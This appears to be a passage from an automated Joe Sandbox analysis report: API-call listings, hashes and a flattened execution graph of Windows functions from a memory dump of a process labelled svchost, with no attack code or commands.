                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeLoadgethostnamelstrlen
                                                                                                                • String ID: Remark
                                                                                                                • API String ID: 619171837-3865500943
                                                                                                                • Opcode ID: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                                                • Instruction ID: 39b077b3adc2da00c1cb4508d3157ec8a6411d10b118cb0f162994d28e94cfda
                                                                                                                • Opcode Fuzzy Hash: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                                                • Instruction Fuzzy Hash: BDE0B635240219BBEF125F91CC46F9E3F2AEB087D1F108014FB18681A5DB739660AB89
                                                                                                                Function 100039BA Relevance: 5.1, APIs: 4, Instructions: 68memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A10
                                                                                                                • memset.MSVCRT ref: 10003A1B
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A31
                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 10003A40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual$memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2542864682-0
                                                                                                                • Opcode ID: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                                                • Instruction ID: 4a5287acb012e3640f8314301f41164344c56cf0a301795e67bafcb82fb77477
                                                                                                                • Opcode Fuzzy Hash: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                                                • Instruction Fuzzy Hash: 82213871A00208AFEB11CF59CC81F9AB7F8FF44344F118459E9809B251D770AA50CB54

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:19.3%
                                                                                                                Total number of Nodes:673
                                                                                                                Total number of Limit Nodes:13
                                                                                                                execution_graph 2329 e124e0 GetModuleHandleW GetProcAddress 2330 e12503 2329->2330 2331 e14560 2332 e14594 2331->2332 2333 e1456f 2331->2333 2333->2332 2334 e1457d CoRevokeClassObject 2333->2334 2334->2333 2335 e13760 SHSetThreadRef CoCreateInstance SHSetThreadRef 2336 e16b60 2337 e16b6e 2336->2337 2338 e148b7 2336->2338 2346 e14979 2338->2346 2358 e14b58 WaitForSingleObjectEx 2338->2358 2340 e1496c 2344 e12a77 13 API calls 2340->2344 2340->2346 2344->2346 2345 e146ca 15 API calls 2347 e14920 2345->2347 2348 e14925 GetLastError 2347->2348 2349 e1493f 2347->2349 2368 e12a77 ReleaseMutex 2348->2368 2373 e14b03 2349->2373 2356 e1495b GetProcessHeap HeapFree 2356->2340 2359 e14903 2358->2359 2360 e14b79 2358->2360 2359->2340 2363 e146ca 2359->2363 2360->2359 2389 e12a26 2360->2389 2364 e146f0 2363->2364 2365 e146d9 GetLastError 2363->2365 2364->2345 2366 e12a52 13 API calls 2365->2366 2367 e146e8 SetLastError 2366->2367 2367->2364 2369 e12a89 SetLastError 2368->2369 2370 e12a8d 2368->2370 2369->2349 2456 e12a11 2370->2456 2374 e14947 2373->2374 2375 e14b1a 2373->2375 2378 e149b2 2374->2378 2375->2374 2468 e12e62 2375->2468 2377 e14b2f GetProcessHeap HeapFree 2377->2375 2379 e149c5 2378->2379 2380 e149bd 2378->2380 2382 e1494e 2379->2382 2383 e12a52 13 API calls 2379->2383 2381 e12a52 13 API calls 2380->2381 2381->2379 2382->2356 2384 e12a52 CloseHandle 2382->2384 2383->2382 2385 e12a64 2384->2385 2386 e12a68 2384->2386 2385->2356 2387 e12a11 12 API calls 2386->2387 2388 e12a76 2387->2388 2392 e12916 2389->2392 2395 e12843 2392->2395 2396 e12855 2395->2396 2407 e125b2 2396->2407 2399 e128f5 2401 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2399->2401 2400 e128c5 2419 e127d1 2400->2419 2403 e12906 2401->2403 2408 e125e1 2407->2408 2409 e125eb 2407->2409 2408->2409 2410 e12916 8 API calls 2408->2410 2411 e1265b GetCurrentThreadId 2409->2411 2410->2409 2412 e126aa 2411->2412 2413 e127cb 2412->2413 2414 e12737 IsDebuggerPresent 2412->2414 2415 e12728 2412->2415 2414->2415 2416 e127a0 OutputDebugStringW 2415->2416 2418 e12747 2415->2418 2423 e12100 2415->2423 2416->2418 2418->2399 2418->2400 2420 e127f2 memset 2419->2420 2421 e127e7 2419->2421 2422 e12820 2420->2422 2421->2420 2424 e122ca 2423->2424 2427 e1212c 2423->2427 2425 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2424->2425 2426 e12307 2425->2426 2426->2416 2427->2424 2428 e121b4 FormatMessageW 2427->2428 2429 e121f3 2428->2429 2430 e1220a 2428->2430 2452 e120aa 2429->2452 2432 e120aa _vsnwprintf 2430->2432 2433 e12205 2432->2433 2434 e12235 GetCurrentThreadId 2433->2434 2435 e120aa _vsnwprintf 2433->2435 2436 e120aa _vsnwprintf 2434->2436 2437 e12230 2435->2437 2438 e1225b 2436->2438 2437->2434 2438->2424 2439 e120aa _vsnwprintf 2438->2439 2440 e1227f 2439->2440 2441 e12297 2440->2441 2442 e120aa _vsnwprintf 2440->2442 2443 e122af 2441->2443 2444 e120aa _vsnwprintf 2441->2444 2442->2441 2445 e122b8 2443->2445 2446 e122cf 2443->2446 2444->2443 2447 e120aa _vsnwprintf 2445->2447 2448 e122d5 2446->2448 2449 e122e9 2446->2449 2447->2424 2451 e120aa _vsnwprintf 2448->2451 2450 e120aa _vsnwprintf 2449->2450 2450->2424 2451->2424 2453 e120bc 2452->2453 2455 e120d4 2452->2455 2454 e1201a _vsnwprintf 2453->2454 2453->2455 2454->2455 2455->2433 2455->2455 2459 e1293d 2456->2459 2464 e1251b GetLastError 2459->2464 2462 e12843 11 API calls 2463 e12985 2462->2463 2465 e12530 2464->2465 2466 e12548 2464->2466 2467 e12916 11 API calls 2465->2467 2466->2462 2467->2466 2469 e12ea2 GetProcessHeap HeapFree 2468->2469 2470 e12e78 2468->2470 2469->2377 2471 e12e7c GetProcessHeap HeapFree 2470->2471 2471->2471 2472 e12e9e 2471->2472 2472->2469 2319 e16a6c 2320 e16a2c 2319->2320 2320->2319 2322 e15e4f LdrResolveDelayLoadedAPI 2320->2322 2322->2320 2000 e15ef0 __wgetmainargs 2477 e168f0 2478 e168f5 2477->2478 2480 e15e4f LdrResolveDelayLoadedAPI 2478->2480 2480->2478 2481 e14c70 2484 e163b2 2481->2484 2483 e14c84 2485 e163be __EH_prolog3_catch 2484->2485 2486 e16aca 2 API calls 2485->2486 2487 e163ca 2486->2487 2487->2483 2488 e16b70 2489 e16bb0 2488->2489 2490 e16b8b 2488->2490 2490->2489 2491 e16b90 GetProcessHeap HeapFree 2490->2491 2491->2490 2500 e16b41 2501 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2500->2501 2502 e16b52 2501->2502 2515 e143c0 RoOriginateError 2503 e164c0 2504 e164fd 2503->2504 2506 e164d2 2503->2506 2505 e164f7 ?terminate@ 2505->2504 2506->2504 2506->2505 2507 e13240 2508 e13250 2507->2508 2509 e1326d 2507->2509 2512 e131df 2508->2512 2513 e131f8 GetProcAddress 2512->2513 2514 e131e8 GetModuleHandleW 2512->2514 2513->2509 2514->2513 2516 e14540 2519 e15094 2516->2519 2518 e14553 2520 e164a6 2 API calls 2519->2520 2521 e150bf 2520->2521 2522 e164a6 2 API calls 2521->2522 2523 e150d7 2522->2523 2523->2518 2524 e11e45 2527 e16483 2524->2527 2530 e163e0 2527->2530 2531 e163ec 2530->2531 2532 e16413 _lock __dllonexit 2531->2532 2533 e163fd _onexit 2531->2533 2537 e1647a _unlock 2532->2537 2536 e11e4a 2533->2536 2537->2536 2550 e153d1 2551 e153df 2550->2551 2552 e15423 2551->2552 2553 e15414 RoOriginateError 2551->2553 2556 e154a1 2552->2556 2555 e1542e 2553->2555 2557 e163b2 2 API calls 2556->2557 2558 e154b6 2557->2558 2560 e154bc 2558->2560 2561 e13718 2558->2561 2560->2555 2562 e13734 2561->2562 2563 e13755 SetEvent 2562->2563 2564 e1375c 2562->2564 2563->2564 2564->2560 2565 e144d0 CoReleaseServerProcess 2566 e144e2 2565->2566 2567 e15250 2568 e1525f RoOriginateError 2567->2568 2569 e15270 2567->2569 2568->2569 2570 e16850 _except_handler4_common 2584 e145a0 2587 e151ae 2584->2587 2588 e15207 CoResumeClassObjects 2587->2588 2589 e151ca 2587->2589 2590 e145b6 2588->2590 2591 e15216 2588->2591 2589->2591 2592 e151d9 CoRegisterClassObject 2589->2592 2591->2590 2594 e1521f CoRevokeClassObject 2591->2594 2592->2589 2593 e15203 2592->2593 2593->2588 2593->2591 2594->2590 2594->2594 2006 e15f25 2021 e167e8 2006->2021 2008 e15f31 GetStartupInfoW 2009 e15f4e 2008->2009 2010 e15f63 2009->2010 2011 e15f6a Sleep 2009->2011 2012 e15f82 _amsg_exit 2010->2012 2014 e15f8c 2010->2014 2011->2009 2012->2014 2013 e15fce _initterm 2019 e15fe9 __IsNonwritableInCurrentImage 2013->2019 2014->2013 2015 e15faf 2014->2015 2014->2019 2016 e160d5 2016->2015 2017 e160de _cexit 2016->2017 2017->2015 2019->2015 2019->2016 2020 e16086 exit 2019->2020 2022 e14136 HeapSetInformation NtSetInformationProcess 2019->2022 2020->2019 2021->2008 2023 e1416e 2022->2023 2023->2023 2078 e16953 2023->2078 2025 e14193 2026 e14197 AttachConsole 2025->2026 2027 e141ab LocalAlloc 2025->2027 2026->2027 2028 e143a7 2027->2028 2032 e141c1 2027->2032 2029 e143b0 FreeConsole 2028->2029 2030 e143b6 ExitProcess 2028->2030 2029->2030 2031 e143a0 LocalFree 2031->2028 2032->2031 2083 e15695 2032->2083 2037 e14202 LoadLibraryExW 2038 e1422a 2037->2038 2039 e1421a GetProcAddress 2037->2039 2040 e14233 2038->2040 2041 e1425a 2038->2041 2039->2038 2042 e140f3 5 API calls 2040->2042 2043 e14261 2041->2043 2044 e14285 SetErrorMode 2041->2044 2046 e14240 2042->2046 2047 e140f3 5 API calls 2043->2047 2093 e15911 PathIsRelativeW 2044->2093 2050 e14393 2046->2050 2051 e14248 2046->2051 2048 e1426f 2047->2048 2048->2050 2052 e14277 2048->2052 2049 e142a3 2129 e15d6a NtOpenProcessToken RtlNtStatusToDosError 2049->2129 2053 e14397 FreeLibrary 2050->2053 2054 e1439e 2050->2054 2162 e13fe7 CoInitializeEx 2051->2162 2170 e137c3 CoInitializeEx 2052->2170 2053->2054 2054->2031 2059 e14255 2059->2050 2060 e14357 2189 e138f0 LoadStringW 2060->2189 2061 e142b6 2141 e13e5b 2061->2141 2065 e14370 2065->2050 2067 e14380 DeactivateActCtx 2065->2067 2068 e1438c ReleaseActCtx 2065->2068 2066 e1434b LocalFree 2066->2065 2067->2068 2068->2050 2072 e14306 2159 e140f3 2072->2159 2074 e14319 2075 e14332 2074->2075 2076 e14341 FreeLibrary 2075->2076 2077 e1433a DestroyWindow 2075->2077 2076->2066 2077->2076 2079 e16962 2078->2079 2080 e16966 2078->2080 2079->2025 2081 e16981 2080->2081 2082 e1696b ApiSetQueryApiSetPresence 2080->2082 2081->2025 2082->2081 2085 e15771 2083->2085 2087 e156d2 2083->2087 2084 e141ef 2084->2031 2089 e140b1 NtQuerySystemInformation 2084->2089 2085->2084 2088 e15884 CharNextW 2085->2088 2086 e1562f CompareStringW 2086->2087 2087->2085 2087->2086 2088->2084 2088->2085 2090 e140dc 2089->2090 2203 e161b0 2090->2203 2092 e140f1 2092->2037 2092->2038 2094 e15940 RtlSetSearchPathMode SearchPathW 2093->2094 2098 e1596f 2093->2098 2095 e15ade 2094->2095 2094->2098 2096 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2095->2096 2097 e15aed 2096->2097 2097->2049 2098->2095 2099 e159d9 2098->2099 2100 e159b8 GetFileAttributesW 2098->2100 2102 e159e7 2099->2102 2103 e15afd 2099->2103 2100->2099 2101 e159ca CreateActCtxW 2100->2101 2101->2099 2104 e15abf ActivateActCtx 2102->2104 2105 e159fc CreateActCtxWWorker 2102->2105 2209 e162f8 2103->2209 2104->2095 2105->2104 2107 e15a27 CreateActCtxWWorker 2105->2107 2107->2095 2110 e15a48 CreateActCtxWWorker 2107->2110 2110->2104 2113 e15a69 GetModuleHandleW CreateActCtxWWorker 2110->2113 2111 e15b74 GetWindowLongW 2114 e15c4e NtdllDefWindowProc_W 2111->2114 2115 e15b85 GetWindow 2111->2115 2112 e15b39 2112->2114 2116 e15b50 SetWindowLongW 2112->2116 2113->2095 2113->2104 2117 e15c5c 2114->2117 2118 e15b99 memset GetClassNameW 2115->2118 2119 e15c47 2115->2119 2116->2117 2121 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2117->2121 2122 e15bc3 CompareStringW 2118->2122 2123 e15bed GetWindow 2118->2123 2119->2114 2124 e15c68 2121->2124 2122->2123 2125 e15be2 GetWindow 2122->2125 2123->2119 2126 e15bfa GetWindowLongW 2123->2126 2124->2049 2125->2123 2126->2119 2127 e15c10 2126->2127 2127->2119 2128 e15c26 SetWindowLongW 2127->2128 2128->2119 2130 e15da1 2129->2130 2136 e15dc7 2130->2136 2213 e15cf1 NtQueryInformationToken 2130->2213 2132 e15dff 2133 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2132->2133 2135 e142ae 2133->2135 2135->2060 2135->2061 2136->2132 2137 e15df7 2136->2137 2138 e15ddd QueryActCtxW 2136->2138 2137->2132 2139 e15e08 NtOpenProcessToken 2137->2139 2138->2137 2139->2132 2140 e15e1d NtSetInformationToken NtClose 2139->2140 2140->2132 2219 e13c66 LoadLibraryExW 2141->2219 2144 e13f62 2144->2066 2154 e13f6b GetPEB RtlImageNtHeader 2144->2154 2145 e13ea2 2236 e13d62 2145->2236 2148 e13f29 2148->2144 2149 e138f0 12 API calls 2150 e13f58 FreeLibrary 2149->2150 2150->2144 2151 e13edf WideCharToMultiByte LocalAlloc 2152 e13f3b 2151->2152 2153 e13f0c WideCharToMultiByte 2151->2153 2152->2149 2153->2148 2155 e13f89 2154->2155 2156 e13fbf ImageDirectoryEntryToData 2154->2156 2155->2156 2157 e13fd4 2156->2157 2158 e15c6c LoadIconW LoadCursorW RegisterClassW CreateWindowExW 2157->2158 2158->2072 2160 e140b1 5 API calls 2159->2160 2161 e14104 2160->2161 2161->2074 2163 e14064 2162->2163 2164 e1400d CLSIDFromString 2162->2164 2165 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2163->2165 2166 e1401c CoCreateInstance 2164->2166 2167 e1405e CoUninitialize 2164->2167 2168 e14070 2165->2168 2166->2167 2169 e14037 2166->2169 2167->2163 2168->2059 2169->2167 2171 e137e2 CoInitializeSecurity 2170->2171 2172 e138ed 2170->2172 2173 e138e7 CoUninitialize 2171->2173 2174 e137fe 2171->2174 2172->2059 2173->2172 2275 e1205a CoCreateInstance 2174->2275 2177 e1381b GetCurrentThreadId 2277 e153ad InitOnceExecuteOnce 2177->2277 2179 e1382a 2278 e14d3c 2179->2278 2181 e1385c CreateEventW 2182 e13880 2181->2182 2183 e13872 SetEvent CloseHandle 2181->2183 2184 e138cf CloseHandle 2182->2184 2185 e13884 CoWaitForMultipleHandles 2182->2185 2183->2182 2184->2173 2188 e138a1 2185->2188 2288 e13584 2188->2288 2190 e13a24 2189->2190 2191 e1392c 2189->2191 2193 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2190->2193 2309 e11f86 2191->2309 2194 e13a4d 2193->2194 2194->2065 2196 e13951 LoadStringW 2196->2190 2197 e13971 2196->2197 2197->2190 2198 e1397f CreateFileW 2197->2198 2198->2190 2199 e139a7 WriteConsoleW WriteConsoleW 2198->2199 2201 e139f5 2199->2201 2201->2201 2202 e13a00 WriteConsoleW CloseHandle 2201->2202 2202->2190 2204 e161b8 2203->2204 2205 e161bb 2203->2205 2204->2092 2208 e161c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2205->2208 2207 e162f6 2207->2092 2208->2207 2212 e161c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2209->2212 2211 e15b02 2211->2111 2211->2112 2212->2211 2214 e15d4c RtlNtStatusToDosError 2213->2214 2215 e15d23 2213->2215 2217 e15d57 NtClose 2214->2217 2215->2214 2216 e15d46 2215->2216 2218 e15d2f NtQueryInformationToken 2215->2218 2216->2214 2217->2136 2218->2214 2218->2216 2220 e13c93 GetLastError 2219->2220 2221 e13d12 RtlImageNtHeader 2219->2221 2224 e13ca0 2220->2224 2225 e13cdb 2220->2225 2222 e13d51 2221->2222 2223 e13d1d 2221->2223 2230 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2222->2230 2223->2222 2227 e13d28 SetProcessMitigationPolicy 2223->2227 2248 e13b09 2224->2248 2226 e13cf2 FormatMessageW 2225->2226 2226->2222 2229 e13cfc 2226->2229 2227->2222 2231 e138f0 12 API calls 2229->2231 2232 e13d60 2230->2232 2235 e13d10 2231->2235 2232->2144 2232->2145 2234 e13cab 2234->2222 2235->2222 2237 e13e52 2236->2237 2238 e13d85 2236->2238 2237->2148 2237->2151 2237->2152 2239 e13dad LocalAlloc 2238->2239 2240 e13d93 _wtoi GetProcAddress 2238->2240 2239->2237 2242 e13ddf WideCharToMultiByte 2239->2242 2240->2237 2243 e13e4b LocalFree 2242->2243 2244 e13dfb 2242->2244 2243->2237 2244->2244 2245 e13e07 GetProcAddress 2244->2245 2245->2243 2246 e13e1f GetProcAddress 2245->2246 2246->2243 2247 e13e3c GetProcAddress 2246->2247 2247->2243 2265 e13a51 CreateFileW 2248->2265 2251 e13b2b GetCurrentProcess IsWow64Process2 2252 e13b4a 2251->2252 2264 e13b91 2251->2264 2254 e13ba1 RtlWow64IsWowGuestMachineSupported 2252->2254 2255 e13b56 2252->2255 2253 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2257 e13b9f 2253->2257 2258 e13bb3 2254->2258 2254->2264 2256 e13b60 GetSystemDirectoryW 2255->2256 2255->2264 2259 e13b72 2256->2259 2257->2226 2257->2234 2260 e13bbc GetSystemWow64Directory2W 2258->2260 2258->2264 2261 e13b76 PathCchAppend 2259->2261 2259->2264 2260->2259 2262 e13bd1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW Wow64EnableWow64FsRedirection 2261->2262 2261->2264 2263 e13c2e WaitForSingleObject CloseHandle CloseHandle 2262->2263 2262->2264 2263->2264 2264->2253 2266 e13af9 2265->2266 2267 e13a88 memset ReadFile 2265->2267 2268 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2266->2268 2269 e13ab0 2267->2269 2270 e13af2 CloseHandle 2267->2270 2272 e13b07 2268->2272 2269->2270 2271 e13abb SetFilePointer 2269->2271 2270->2266 2271->2270 2273 e13acc ReadFile 2271->2273 2272->2251 2272->2264 2273->2270 2274 e13aeb 2273->2274 2274->2270 2276 e1207c CreateEventW 2275->2276 2276->2173 2276->2177 2277->2179 2279 e14d5f 2278->2279 2286 e14dea 2279->2286 2294 e164a6 2279->2294 2281 e14dab 2282 e164a6 2 API calls 2281->2282 2283 e14dc9 2282->2283 2284 e164a6 2 API calls 2283->2284 2284->2286 2285 e164a6 2 API calls 2287 e14fbd 2285->2287 2286->2285 2286->2287 2287->2181 2289 e135a6 2288->2289 2290 e164a6 2 API calls 2289->2290 2293 e135f1 2289->2293 2290->2293 2302 e13306 2293->2302 2295 e163b2 __EH_prolog3_catch 2294->2295 2298 e16aca 2295->2298 2297 e163ca 2297->2281 2299 e16adf malloc 2298->2299 2300 e16ad2 _callnewh 2299->2300 2301 e16aee 2299->2301 2300->2299 2300->2301 2301->2297 2305 e13320 2302->2305 2303 e133d8 2303->2184 2304 e1337e AcquireSRWLockExclusive 2304->2305 2305->2303 2305->2304 2306 e13399 ReleaseSRWLockExclusive 2305->2306 2307 e133b3 DecodePointer 2305->2307 2308 e133a9 ReleaseSRWLockExclusive 2305->2308 2306->2305 2307->2305 2308->2307 2310 e11f94 2309->2310 2311 e11fb6 2310->2311 2313 e1201a _vsnwprintf 2310->2313 2311->2190 2311->2196 2314 e1203e 2313->2314 2314->2311 2599 e124a7 2600 e124be 2599->2600 2601 e124af 2599->2601 2603 e123be 2601->2603 2604 e123f1 GetModuleHandleExW 2603->2604 2605 e1240d 2603->2605 2604->2605 2609 e12405 2604->2609 2606 e1242d GetModuleFileNameA 2605->2606 2605->2609 2606->2609 2607 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2608 e12493 2607->2608 2608->2600 2609->2607 2610 e160a6 _XcptFilter 2611 e11e30 2614 e153ad InitOnceExecuteOnce 2611->2614 2613 e11e35 2614->2613 2615 e11db5 2616 e16483 4 API calls 2615->2616 2617 e11dba 2616->2617 2618 e148b7 2619 e14979 2618->2619 2620 e148cf 2618->2620 2620->2619 2621 e14b58 12 API calls 2620->2621 2622 e14903 2621->2622 2623 e1496c 2622->2623 2624 e146ca 15 API calls 2622->2624 2623->2619 2626 e12a77 13 API calls 2623->2626 2625 e14917 2624->2625 2627 e146ca 15 API calls 2625->2627 2626->2619 2628 e14920 2627->2628 2629 e14925 GetLastError 2628->2629 2630 e1493f 2628->2630 2631 e12a77 13 API calls 2629->2631 2632 e14b03 6 API calls 2630->2632 2633 e14935 SetLastError 2631->2633 2634 e14947 2632->2634 2633->2630 2635 e149b2 13 API calls 2634->2635 2636 e1494e 2635->2636 2637 e1495b GetProcessHeap HeapFree 2636->2637 2638 e12a52 13 API calls 2636->2638 2637->2623 2638->2637 2639 e160ba 2640 e160d5 2639->2640 2641 e160ce _exit 2639->2641 2642 e160de _cexit 2640->2642 2643 e160e9 2640->2643 2641->2640 2642->2643 2644 e1693a 2645 e168f5 2644->2645 2645->2644 2647 e15e4f LdrResolveDelayLoadedAPI 2645->2647 2647->2645 2653 e15e80 2654 e15e85 2653->2654 2662 e16598 GetModuleHandleW 2654->2662 2656 e15e91 __set_app_type __p__fmode __p__commode 2657 e15ec9 2656->2657 2658 e15ed2 __setusermatherr 2657->2658 2659 e15ede 2657->2659 2658->2659 2664 e167cd _controlfp 2659->2664 2661 e15ee3 2663 e165a9 2662->2663 2663->2656 2664->2661 2665 e15400 2666 e15423 2665->2666 2667 e15414 RoOriginateError 2665->2667 2668 e154a1 3 API calls 2666->2668 2669 e1542e 2667->2669 2668->2669 2670 e13200 2671 e1320d 2670->2671 2672 e1322a 2670->2672 2673 e131df GetModuleHandleW 2671->2673 2674 e13217 GetProcAddress 2673->2674 2674->2672 2675 e13180 2683 e130bc 2675->2683 2678 e131a1 2679 e131ca 2678->2679 2688 e12f81 2678->2688 2684 e130df GetCurrentThreadId 2683->2684 2685 e130f8 2683->2685 2684->2685 2687 e1311f GetCurrentThreadId 2685->2687 2700 e13004 2685->2700 2687->2678 2687->2679 2689 e12f98 2688->2689 2693 e12fdc 2688->2693 2690 e12faa 2689->2690 2704 e14751 GetCurrentProcessId 2689->2704 2691 e12fc7 GetCurrentThreadId 2690->2691 2690->2693 2691->2693 2693->2679 2694 e12ebd 2693->2694 2695 e12ed4 2694->2695 2696 e12ee9 2694->2696 2697 e12f7a 2695->2697 2699 e1230b 3 API calls 2695->2699 2696->2697 2809 e12d48 2696->2809 2697->2679 2699->2696 2701 e130b3 2700->2701 2702 e13024 2700->2702 2701->2687 2702->2701 2702->2702 2703 e1309f memcpy_s 2702->2703 2703->2701 2705 e11f86 _vsnwprintf 2704->2705 2706 e1478e CreateMutexExW 2705->2706 2707 e146ca 15 API calls 2706->2707 2708 e147b7 2707->2708 2709 e147cb 2708->2709 2710 e147bf 2708->2710 2712 e14b58 12 API calls 2709->2712 2730 e12553 2710->2730 2714 e147e1 2712->2714 2713 e147c4 2717 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2713->2717 2733 e12c6f 2714->2733 2719 e1488c 2717->2719 2718 e14815 2721 e129db 11 API calls 2718->2721 2722 e14832 2718->2722 2719->2690 2721->2722 2725 e1483f 2722->2725 2726 e1484a 2722->2726 2751 e149d3 2722->2751 2723 e129db 11 API calls 2723->2726 2725->2723 2725->2726 2727 e1486a 2726->2727 2728 e12a77 13 API calls 2726->2728 2727->2713 2729 e12a52 13 API calls 2727->2729 2728->2727 2729->2713 2731 e1251b 12 API calls 2730->2731 2732 e12568 2731->2732 2732->2713 2734 e12cad 2733->2734 2735 e12cbb OpenSemaphoreW 2734->2735 2736 e12cd2 GetLastError 2735->2736 2737 e12cef 2735->2737 2738 e12ceb 2736->2738 2739 e12cdd 2736->2739 2773 e12b5a WaitForSingleObject 2737->2773 2741 e12d2f 2738->2741 2744 e12a52 13 API calls 2738->2744 2770 e129fa 2739->2770 2745 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2741->2745 2744->2741 2746 e12d42 2745->2746 2746->2718 2748 e129db 2746->2748 2747 e129db 11 API calls 2747->2738 2749 e12916 11 API calls 2748->2749 2750 e129f6 2749->2750 2750->2718 2793 e1230b GetProcessHeap HeapAlloc 2751->2793 2754 e14a03 2756 e129db 11 API calls 2754->2756 2755 e14a1c 2757 e14afd 2755->2757 2796 e12a9c 2755->2796 2758 e14a17 2756->2758 2758->2725 2761 e14a60 memset 2764 e14a52 2761->2764 2762 e14a43 2763 e129db 11 API calls 2762->2763 2763->2764 2765 e14ad4 2764->2765 2766 e12a52 13 API calls 2764->2766 2767 e14ade 2765->2767 2769 e12a52 13 API calls 2765->2769 2766->2765 2767->2758 2768 e14ae2 GetProcessHeap HeapFree 2767->2768 2768->2758 2769->2767 2788 e1298e 2770->2788 2774 e12b8b 2773->2774 2787 e12b78 2773->2787 2776 e12b96 2774->2776 2777 e12be4 ReleaseSemaphore 2774->2777 2778 e12ba7 ReleaseSemaphore 2774->2778 2775 e129fa 12 API calls 2785 e12b86 2775->2785 2782 e129db 11 API calls 2776->2782 2776->2785 2780 e12c02 2777->2780 2777->2787 2779 e12bbf ReleaseSemaphore 2778->2779 2778->2787 2779->2776 2783 e12bd0 GetLastError 2779->2783 2780->2776 2781 e12c0e ReleaseSemaphore 2780->2781 2781->2776 2784 e12c1c GetLastError 2781->2784 2782->2785 2783->2776 2783->2785 2784->2776 2786 e12c29 WaitForSingleObject 2784->2786 2785->2738 2785->2747 2786->2776 2786->2787 2787->2775 2789 e1251b 12 API calls 2788->2789 2790 e129a9 2789->2790 2791 e12843 11 API calls 2790->2791 2792 e129d2 2791->2792 2792->2738 2794 e1233f 2793->2794 2795 e12328 GetProcessHeap 2793->2795 2794->2754 2794->2755 2795->2794 2797 e12b54 2796->2797 2798 e12ac9 2796->2798 2799 e12afd CreateSemaphoreExW 2798->2799 2800 e12b23 2799->2800 2801 e12b19 2799->2801 2802 e12553 12 API calls 2800->2802 2803 e146ca 15 API calls 2801->2803 2804 e12b21 2802->2804 2803->2804 2805 e129db 11 API calls 2804->2805 2806 e12b3d 2804->2806 2805->2806 2807 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2806->2807 2808 e12b50 2807->2808 2808->2761 2808->2762 2810 e12da3 2809->2810 2811 e12e16 2810->2811 2812 e1230b 3 API calls 2810->2812 2814 e12e5c 2811->2814 2822 e14c0a 2811->2822 2813 e12df4 2812->2813 2813->2811 2815 e12dfb GetProcessHeap HeapFree 2813->2815 2814->2697 2815->2811 2818 e14c0a memcpy_s 2819 e12e3f 2818->2819 2826 e14ba0 2819->2826 2823 e14c1a 2822->2823 2824 e12e30 2822->2824 2823->2824 2825 e14c3d memcpy_s 2823->2825 2824->2818 2825->2824 2827 e14bb3 2826->2827 2829 e12e4e memset 2826->2829 2828 e14bdb memcpy_s 2827->2828 2827->2829 2828->2829 2829->2814 2830 e14700 2833 e1445f 2830->2833 2832 e1470d 2834 e13306 ctype 4 API calls 2833->2834 2835 e1446c 2834->2835 2835->2832 2853 e15490 2855 e154fa 2853->2855 2854 e155fb RoOriginateErrorW 2862 e155f9 2854->2862 2855->2854 2859 e1554c 2855->2859 2856 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2857 e1562b 2856->2857 2858 e155d2 RoOriginateError 2858->2862 2859->2858 2860 e155e1 2859->2860 2863 e133f9 2860->2863 2862->2856 2864 e1341e AcquireSRWLockShared 2863->2864 2868 e13487 2863->2868 2866 e13441 DecodePointer 2864->2866 2867 e13477 2864->2867 2870 e13461 2866->2870 2867->2868 2869 e1347b ReleaseSRWLockShared 2867->2869 2871 e134c9 